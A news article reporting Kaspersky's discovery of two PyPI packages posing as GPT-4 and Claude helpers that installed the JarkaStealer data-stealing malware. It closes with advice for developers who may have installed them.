Malware Hidden In Python Packages Affects Developers Worldwide

Two malicious Python packages on PyPI mimicked AI tools but secretly installed JarkaStealer malware, stealing sensitive data from over 1,700 users.

Kaspersky’s cybersecurity experts have discovered two malicious Python packages on the Python Package Index (PyPI), a widely used software repository, as announced on Thursday.

These packages claimed to help developers interact with advanced language models like GPT-4 Turbo and Claude AI but were actually designed to install malware called JarkaStealer.

The packages, named “gptplus” and “claudeai-eng,” appeared legitimate, with descriptions and examples showing how they could be used to create AI-powered chats.

In reality, they only pretended to work by using a demo version of ChatGPT. Their actual purpose was to deliver malware. Hidden in the code was a mechanism that downloaded and installed JarkaStealer, compromising the user’s system.

If Java wasn’t already installed, the packages would even fetch and install it from Dropbox to ensure the malware could run.

These malicious packages were available for more than a year, during which they were downloaded over 1,700 times by users in more than 30 countries.

The malware targeted confidential data such as browser information, screenshots, system details, and even session tokens for applications like Telegram, Discord, and Steam. This stolen data was sent to attackers and then erased from the victim’s computer.

JarkaStealer is a dangerous tool often used to collect sensitive information. The source code was also found on GitHub, suggesting that the people distributing it on PyPI may not have been its original authors.

PyPI administrators have since removed these malicious packages, but similar threats could appear elsewhere.

Developers who installed these packages should delete them immediately and change all passwords and session tokens used on affected devices. While the malware doesn’t persist on its own, it could have already stolen critical information.

To stay safe, developers are encouraged to carefully inspect open-source software before use, including checking the publisher’s profile and package details.

For added security, tools that detect threats in open-source components can be included in development processes to help prevent such attacks.